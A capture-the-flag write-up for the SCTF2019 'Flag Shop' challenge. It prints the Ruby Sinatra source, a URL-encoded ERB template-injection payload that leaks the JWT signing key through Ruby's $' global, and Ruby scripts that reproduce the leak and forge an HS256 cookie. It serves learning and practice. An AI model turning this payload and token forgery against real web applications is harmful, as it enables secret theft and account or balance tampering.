[SCTF2019]Flag Shop

Opening the page shows a shop interface. Clicking "work" earns money (the `jkl` counter in the cookie) until you have enough to buy the flag.
At first I took this for a logic flaw and assumed a simple brute force of the work request would do; clearly it does not.
The cookie holds the user's balance along with their identity, so while each work request does add money, the cookie returned in the response has to be carried forward as the header of the next request.
A brute-force script written that way could probably be made to work; I did not try it. Given the source below it would be hopeless anyway: each work adds `SecureRandom.random_number(10)`, i.e. 0 to 9, against a FLAGPRICE of 1000000000000000000000000000.

After getting in I still checked /robots.txt, which lists /filebak. That route serves the application's own source: a Ruby Sinatra app. The interesting handler is /work. It reads `name`, `do` and an optional `SECRET` parameter; when `do` equals `"#{name[0,7]} is working"`, the first seven characters of `name` are interpolated into an ERB template string that is then evaluated, so `name` is a server-side template injection with a seven-character budget.
The `SECRET` branch does not hand back the key directly: `ENV["SECRET"].match(...)` only performs a regex match, and `puts ENV["FLAG"]` goes to the server's stdout, not to the client. What the match does do is set Ruby's match globals. With `SECRET=` (empty), `"".match(/[0-9a-z]+/)` is nil, `"#{nil}"` is `""`, and `ENV["SECRET"].match("")` matches the empty string at offset 0, leaving the entire secret in `$'` (the text after the last match). `<%=$'%>` is exactly seven characters, so it fits in `name[0,7]`, and the alert in the response contains the JWT signing key. Because the route block is defined at the top level of the file, the template (evaluated against TOPLEVEL_BINDING by default) sees the same `$'`.
The parameters are URL-encoded so the special characters are passed through intact. The source, as served by /filebak:

```ruby
require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'
FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  auth = auth[0]
  unless params[:SECRET].nil?
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end
  if params[:do] == "#{params[:name][0,7]} is working" then
    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result
  end
end

post "/shop" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  if auth[0]["jkl"] < FLAGPRICE then
    json({title: "error",message: "no enough jkl"})
  else
    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end

def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end
```
Payload (URL-encoded so that `<`, `%`, `=` and `'` reach the application intact):

/work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20is%20working

Decoded: `SECRET=` (empty), `name=<%=$'%>`, `do=<%=$'%> is working`. The response body is `<script>alert('<the 128-hex-character secret> working successfully!')</script>`.
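The leak, reproduced without Sinatra or JWT handling so the mechanism can be stepped through locally. This is an added example, not code from the challenge or the original writeup; `DEMO_SECRET` is a constructed stand-in for `ENV["SECRET"]`, and `work` re-implements only the decision logic of the /work route.

```ruby
require 'erb'

# Constructed stand-in for the server's ENV["SECRET"]; the real value is
# SecureRandom.hex(64), a 128-character lowercase hex string.
DEMO_SECRET = 'c0ffee' * 8

# Exactly seven characters: the longest ERB expression tag that survives name[0,7].
PAYLOAD_NAME = "<%=$'%>"

# Re-implements the decision logic of the /work route for a single request,
# without Sinatra or JWT handling. `params` is a Hash of query parameters.
# Returns the rendered response body, or nil when the do/name check fails.
def work(params, secret)
  unless params['SECRET'].nil?
    # With SECRET="" the inner match is nil, "#{nil}" is "", and matching the
    # empty pattern succeeds at offset 0: $' (post-match) now holds the whole secret.
    if secret.match("#{params['SECRET'].match(/[0-9a-z]+/)}")
      # the real handler does `puts ENV["FLAG"]` here, which only reaches the server's stdout
    end
  end

  if params['do'] == "#{params['name'][0, 7]} is working"
    # The SSTI sink: name[0,7] is spliced into the template source, so an ERB
    # tag inside it is executed. The real code calls .result with no binding
    # (TOPLEVEL_BINDING); because the route block is defined at the top level
    # of the app file it shares that scope, and the $' set above is visible to
    # the template. Passing `binding` makes this demo behave the same no matter
    # where `work` is called from.
    ERB.new("<script>alert('#{params['name'][0, 7]} working successfully!')</script>").result(binding)
  end
end

# Sends the exploit request through `work` and extracts the leaked secret
# from the alert() text, as a browser or proxy would show it.
def leak_secret(secret = DEMO_SECRET)
  params = { 'SECRET' => '', 'name' => PAYLOAD_NAME, 'do' => "#{PAYLOAD_NAME} is working" }
  body = work(params, secret)
  body && body[/alert\('(.*) working successfully!'\)/, 1]
end

puts leak_secret if __FILE__ == $PROGRAM_NAME
```

Two details worth noticing when reading the output: a failed match (`"".match(/[0-9a-z]+/)`) resets `$~` to nil, so it is the outer `secret.match("")` that populates `$'`; and nothing between that match and the ERB evaluation runs another regex, otherwise `$'` would refer to that later match instead.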

With the signing key in hand, the rest is JWT forgery: decode the current `auth` cookie with an online JWT tool, paste in the secret so the signature is recomputed, set `jkl` to at least FLAGPRICE, and replace the cookie. Then POST /shop.
On success the server appends `{flag: ENV["FLAG"]}` to the decoded token array and re-signs it, so the `auth` cookie in the response carries the flag in its payload; base64url-decoding the middle segment of that cookie is enough to read it.
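The forgery step without an online tool, as an added example that is not part of the original writeup. It implements HS256 JWT signing and verification from the Ruby standard library (`openssl`, `json`) to stand in for the server's `jwt` gem calls, and re-implements the `/shop` decision so the forged cookie can be checked locally; `LEAKED_SECRET` is a constructed stand-in for the value recovered from /work.

```ruby
require 'json'
require 'openssl'

FLAGPRICE = 1000000000000000000000000000

# Constructed stand-in for the key leaked from /work; the real one is the
# 128-character hex string in ENV["SECRET"].
LEAKED_SECRET = 'c0ffee' * 8

# base64url without padding, as JWT segments use ('m0' is strict base64, no newlines).
def b64url_encode(bytes)
  [bytes].pack('m0').tr('+/', '-_').delete('=')
end

def b64url_decode(str)
  padded = str.tr('-_', '+/')
  padded += '=' * ((4 - padded.length % 4) % 4)
  padded.unpack1('m')
end

def hs256_mac(secret, signing_input)
  b64url_encode(OpenSSL::HMAC.digest(OpenSSL::Digest.new('SHA256'), secret, signing_input))
end

# Constant-time comparison so a verifier does not leak the MAC byte by byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Stand-in for JWT.encode(payload, secret, 'HS256'): header.payload.signature.
def jwt_hs256_encode(payload, secret)
  signing_input = "#{b64url_encode(JSON.generate({ 'alg' => 'HS256' }))}.#{b64url_encode(JSON.generate(payload))}"
  "#{signing_input}.#{hs256_mac(secret, signing_input)}"
end

# Stand-in for JWT.decode(token, secret, true, algorithm: 'HS256'), payload only.
# Returns the payload Hash, or nil when the signature does not verify.
def jwt_hs256_decode(token, secret)
  header, body, sig = token.split('.', 3)
  return nil if sig.nil? || !secure_equal?(hs256_mac(secret, "#{header}.#{body}"), sig)
  JSON.parse(b64url_decode(body))
end

# The forged auth cookie: the same claims the server issues, with jkl set to the price.
def forge_auth_cookie(secret, uid, jkl = FLAGPRICE)
  jwt_hs256_encode({ 'uid' => uid, 'jkl' => jkl }, secret)
end

# Why editing the cookie alone (the brute-force idea) fails: re-encoding the
# payload without re-signing leaves a MAC that no longer matches.
def tamper_without_secret(token, new_jkl)
  header, body, sig = token.split('.', 3)
  payload = JSON.parse(b64url_decode(body))
  payload['jkl'] = new_jkl
  "#{header}.#{b64url_encode(JSON.generate(payload))}.#{sig}"
end

# The decision POST /shop makes on the presented cookie.
def shop(token, secret)
  auth = jwt_hs256_decode(token, secret)
  return 'invalid token' if auth.nil?
  auth['jkl'] < FLAGPRICE ? 'no enough jkl' : 'success'
end

if __FILE__ == $PROGRAM_NAME
  cookie = forge_auth_cookie(LEAKED_SECRET, 'any-uuid-will-do')
  puts cookie
  puts shop(cookie, LEAKED_SECRET)
end
```

The `uid` claim can be anything: the server never ties it to a session, it only checks the signature and the `jkl` value. Against the live challenge the printed token goes into the `auth` cookie of the POST /shop request, and the real secret replaces `LEAKED_SECRET`.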
